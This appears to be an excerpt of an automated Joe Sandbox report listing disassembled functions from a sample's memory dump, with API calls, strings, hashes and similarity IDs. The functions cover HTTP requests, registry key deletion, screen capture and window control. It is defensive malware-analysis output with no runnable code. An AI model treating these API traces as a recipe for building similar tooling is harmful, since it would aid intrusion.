GetDesktopWindow.USER32 ref: 00FA794E
GetWindowRect.USER32(00000000), ref: 00FA7955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FA796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FA7985

Part of subcall function 00F12234: GetWindowLongW.USER32(?,000000EB), ref: 00F12242

Strings

0, xrefs: 00FA77D0
tooltips_class32, xrefs: 00FA7890, 00FA7915

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: da10d4a7b395b977133d8f4b5fc621564a9a7cbad18fd07e2864fefeedecfaa2
Instruction ID: 89e7980ee1046d501175225fae50bb903720fd8fc1a21e00e2edf4ae7c950fcd
Opcode Fuzzy Hash: da10d4a7b395b977133d8f4b5fc621564a9a7cbad18fd07e2864fefeedecfaa2
Instruction Fuzzy Hash: 4B7189B1508344AFD725DF18CC48FAABBE9FB8A310F14045EF98587261DB74E906EB11

Function 00FA9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0

DragQueryPoint.SHELL32(?,?), ref: 00FA9BA3

Part of subcall function 00FA80AE: ClientToScreen.USER32(?,?), ref: 00FA80D4
Part of subcall function 00FA80AE: GetWindowRect.USER32(?,?), ref: 00FA814A
Part of subcall function 00FA80AE: PtInRect.USER32(?,?,?), ref: 00FA815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00FA9C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FA9C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FA9C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FA9C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00FA9C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00FA9CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00FA9CD3
DragFinish.SHELL32(?), ref: 00FA9CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00FA9DCD

Strings

@GUI_DRAGFILE, xrefs: 00FA9D7C
@GUI_DRAGID, xrefs: 00FA9D45
@GUI_DROPID, xrefs: 00FA9CFA

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 4c409e3f65117213bedb403e12a0561c116cbd0c6cdcf949b7f4b1539785c1e4
Instruction ID: 45e85d2f3165f63802e6b4040d27e74318448c5c44efb0836024b933a340481d
Opcode Fuzzy Hash: 4c409e3f65117213bedb403e12a0561c116cbd0c6cdcf949b7f4b1539785c1e4
Instruction Fuzzy Hash: 6B617BB1108305AFC705EF60DC85D9FBBE8EF89750F40092EF592921A1DB749A49EB52

Function 00F8CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F8CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F8CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F8CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F8CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F8CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F8CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F8CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F8CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F8D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F8D035
InternetCloseHandle.WININET(00000000), ref: 00F8D040

Strings

, xrefs: 00F8CFBA

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 9acdcb9df4f12fd3a2d226871f97fe49f2bcc41a6f73120ab34824ec730a8ec1
Instruction ID: dd2f534325cf5c26f649c23236c3fa7d7e08d682714a87f53d3b50abdac4063a
Opcode Fuzzy Hash: 9acdcb9df4f12fd3a2d226871f97fe49f2bcc41a6f73120ab34824ec730a8ec1
Instruction Fuzzy Hash: 3E513AB1900608BFEB25AF61CC88AEB7BBCFF49794F00441AF94696650D734D945BBA0

Function 00FA8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00FA66D6,?,?), ref: 00FA8FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA8FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9009
CloseHandle.KERNEL32(00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9016
GlobalLock.KERNEL32(00000000), ref: 00FA9024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9033
GlobalUnlock.KERNEL32(00000000), ref: 00FA903C
CloseHandle.KERNEL32(00000000,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FA66D6,?,?,00000000,?), ref: 00FA9054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00FB0C04,?), ref: 00FA906D
GlobalFree.KERNEL32(00000000), ref: 00FA907D
GetObjectW.GDI32(00000000,00000018,?), ref: 00FA909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00FA90CD
DeleteObject.GDI32(00000000), ref: 00FA90F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FA910B

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: c20b7462dabf7f19e3a6d503350c95230bb7f9ba14824139b5a8e95b540c2edf
Instruction ID: 642da10b0f28fccfff1fe49bf4a4aca95866e1e3ad431254a35f3c7bceadf1c4
Opcode Fuzzy Hash: c20b7462dabf7f19e3a6d503350c95230bb7f9ba14824139b5a8e95b540c2edf
Instruction Fuzzy Hash: BC410EB5600208BFDB119F65DC48EAB7BB9FF8A751F108069F906D7260DB709D41EB20

Function 00F9C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

Part of subcall function 00F9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9C10E,?,?), ref: 00F9D415
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D451
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4C8
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F9C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 00F9C26A
RegCloseKey.ADVAPI32(?), ref: 00F9C2DE
RegCloseKey.ADVAPI32(?), ref: 00F9C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00F9C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F9C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 00F9C382
FreeLibrary.KERNEL32(00000000), ref: 00F9C3E3
RegCloseKey.ADVAPI32(00000000), ref: 00F9C3F4

Strings

advapi32.dll, xrefs: 00F9C34D
RegDeleteKeyExW, xrefs: 00F9C35E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: d83d9451f628cb6517c42b03ce7e6011cb4d2d0884755b7f69e772ec9e4640e1
Instruction ID: e944c15e2bd657282e27bcf0bc24daac867c783600604e8d2e4616d08dbd3109
Opcode Fuzzy Hash: d83d9451f628cb6517c42b03ce7e6011cb4d2d0884755b7f69e772ec9e4640e1
Instruction Fuzzy Hash: 54C19E35604201EFEB10DF54C895F6ABBE1BF84318F14849CF4568B2A2CB35ED86EB91

Function 00F92FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F93035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00F93045
CreateCompatibleDC.GDI32(?), ref: 00F93051
SelectObject.GDI32(00000000,?), ref: 00F9305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00F930CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00F93109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00F9312D
SelectObject.GDI32(?,?), ref: 00F93135
DeleteObject.GDI32(?), ref: 00F9313E
DeleteDC.GDI32(?), ref: 00F93145
ReleaseDC.USER32(00000000,?), ref: 00F93150

Strings

(, xrefs: 00F930EA

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 74bdede3ac105b54e0145f1909decc873d566c4dc44dc0c3a253870db3a3539f
Instruction ID: dcf98a4a23ddd67685ca27a478579a3ff27902694debfb23bf9439e540fc2f8c
Opcode Fuzzy Hash: 74bdede3ac105b54e0145f1909decc873d566c4dc44dc0c3a253870db3a3539f
Instruction Fuzzy Hash: 5061D2B6D00219AFDF04CFA4DC84EAEBBB5FF48310F208529E556A7250D775AA41DFA0

Function 00FAA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0

GetSystemMetrics.USER32(0000000F), ref: 00FAA990
GetSystemMetrics.USER32(00000011), ref: 00FAA9A7
GetSystemMetrics.USER32(00000004), ref: 00FAA9B3
GetSystemMetrics.USER32(0000000F), ref: 00FAA9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00FAAC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00FAAC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00FAAC54
ShowWindow.USER32(00000003,00000000), ref: 00FAAC73
InvalidateRect.USER32(?,00000000,00000001), ref: 00FAAC95
DefDlgProcW.USER32(?,00000005,?), ref: 00FAACBB

Strings

@, xrefs: 00FAABD0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: b2989b6356964851ac0bc844127470a7257ad4111f3482233a60a462eb29bf55
Instruction ID: 2dd34dd476228c4e943ff5ccc003958a7fe00a0f57158b2441242b687bfaca43
Opcode Fuzzy Hash: b2989b6356964851ac0bc844127470a7257ad4111f3482233a60a462eb29bf55
Instruction Fuzzy Hash: 02B1CBB1A00219DFDF14CF68C9847AE3BF2FF85720F188069EC459B295D734A984EB61

Function 00F752AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00F752E6
GetWindowTextW.USER32(?,?,00000400), ref: 00F75328
_wcslen.LIBCMT ref: 00F75339
CharUpperBuffW.USER32(?,00000000), ref: 00F75345
_wcsstr.LIBVCRUNTIME ref: 00F7537A
GetClassNameW.USER32(00000018,?,00000400), ref: 00F753B2
GetWindowTextW.USER32(?,?,00000400), ref: 00F753EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00F75445
GetClassNameW.USER32(?,?,00000400), ref: 00F75477
GetWindowRect.USER32(?,?), ref: 00F754EF

Strings

ThumbnailClass, xrefs: 00F753BD, 00F75450

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: cb02d1b138e160443466151bb1c1d31a770c40cfeb6e57c30d01c0102b3defbf
Instruction ID: 3dbc68401db1ebde57ffbb69e2291028e10faa22bcebbac0eeb51e2c4d737348
Opcode Fuzzy Hash: cb02d1b138e160443466151bb1c1d31a770c40cfeb6e57c30d01c0102b3defbf
Instruction Fuzzy Hash: 1B912B71504B06AFD704CF24CC90BA9B7AAFF41724F04851AFA4E82190EBB5FD55EB92

Function 00FA976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00F124B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FA97B6
GetFocus.USER32 ref: 00FA97C6
GetDlgCtrlID.USER32(00000000), ref: 00FA97D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00FA9879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00FA992B
GetMenuItemCount.USER32(?), ref: 00FA9948
GetMenuItemID.USER32(?,00000000), ref: 00FA9958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00FA998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00FA99CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FA99FD

Strings

0, xrefs: 00FA98FB

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 94ba1465d8944ac7e763f927de458d6ddc3dee1b6770e44b6f6f078ff810022b
Instruction ID: b6f8c74a50fc512dd74399f3983d135a38a1bb1a591a1b87de0ba6ba2cfad186
Opcode Fuzzy Hash: 94ba1465d8944ac7e763f927de458d6ddc3dee1b6770e44b6f6f078ff810022b
Instruction Fuzzy Hash: 2B81D6B1908355AFD710CF14CC84A6B7BE8FF8A364F04052DF98597291DBB4D905EBA1

Function 00F7C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00FE29C0,000000FF,00000000,00000030), ref: 00F7C973
SetMenuItemInfoW.USER32(00FE29C0,00000004,00000000,00000030), ref: 00F7C9A8
Sleep.KERNEL32(000001F4), ref: 00F7C9BA
GetMenuItemCount.USER32(?), ref: 00F7CA00
GetMenuItemID.USER32(?,00000000), ref: 00F7CA1D
GetMenuItemID.USER32(?,-00000001), ref: 00F7CA49
GetMenuItemID.USER32(?,?), ref: 00F7CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F7CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F7CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F7CB0C

Strings

0, xrefs: 00F7C904

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 927b390a9ddaff782285cfcb4e5610cce26a171774ade70fe78ecb3413982e9a
Instruction ID: 8bffe42e74a69d47b03ae7f42f9df87ee54f2ff03cc0c78713af536e156a0432
Opcode Fuzzy Hash: 927b390a9ddaff782285cfcb4e5610cce26a171774ade70fe78ecb3413982e9a
Instruction Fuzzy Hash: 11619371D00249AFEF11CF68DC89AEE7BB9FB45358F04801AF955A3151D738AD01EBA2

Function 00F7E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F7E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F7E4FA
_wcslen.LIBCMT ref: 00F7E504
_wcsstr.LIBVCRUNTIME ref: 00F7E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F7E570

Strings

%u.%u.%u.%u, xrefs: 00F7E64E
DefaultLangCodepage, xrefs: 00F7E5D3
StringFileInfo\, xrefs: 00F7E543
04090000, xrefs: 00F7E5A6
\VarFileInfo\Translation, xrefs: 00F7E568

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: d2273548237553c672b9bea0e77ebbf4e96e07169a0a291255d8ddd332617681
Instruction ID: 123750ee9d19f55f8344a6b433ffdf547613a5cdb7fd236c0892e856a6abcfb6
Opcode Fuzzy Hash: d2273548237553c672b9bea0e77ebbf4e96e07169a0a291255d8ddd332617681
Instruction Fuzzy Hash: B44106B29042187ADB01BB649C47EBF776CDF55730F14406BF905E6182FB78EA01B2A6

Function 00F9D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00F9D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F9D7A8

Part of subcall function 00F9D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00F9D70A
Part of subcall function 00F9D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00F9D71D
Part of subcall function 00F9D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F9D72F
Part of subcall function 00F9D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00F9D765
Part of subcall function 00F9D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00F9D753

Strings

advapi32.dll, xrefs: 00F9D718
RegDeleteKeyExW, xrefs: 00F9D729

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 9e591fd20b346a380e397c0621e1b759df44f9f18b491483a740e41736a3918d
Instruction ID: 044286c0a26806e9d58ae23a9a31a766ba575455e837ec6bb9d29e5cacb172cc
Opcode Fuzzy Hash: 9e591fd20b346a380e397c0621e1b759df44f9f18b491483a740e41736a3918d
Instruction Fuzzy Hash: 453180B6D0112DBBEB209B90DC88EFFBB7CEF46754F100065F906E2104DA349E45AAA1

Function 00F7EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00F7EFCB

Part of subcall function 00F2F215: timeGetTime.WINMM(?,?,00F7EFEB), ref: 00F2F219

Sleep.KERNEL32(0000000A), ref: 00F7EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00F7F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F7F03E
SetActiveWindow.USER32 ref: 00F7F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F7F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00F7F08A
Sleep.KERNEL32(000000FA), ref: 00F7F095
IsWindow.USER32 ref: 00F7F0A1
EndDialog.USER32(00000000), ref: 00F7F0B2

Strings

BUTTON, xrefs: 00F7F030

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

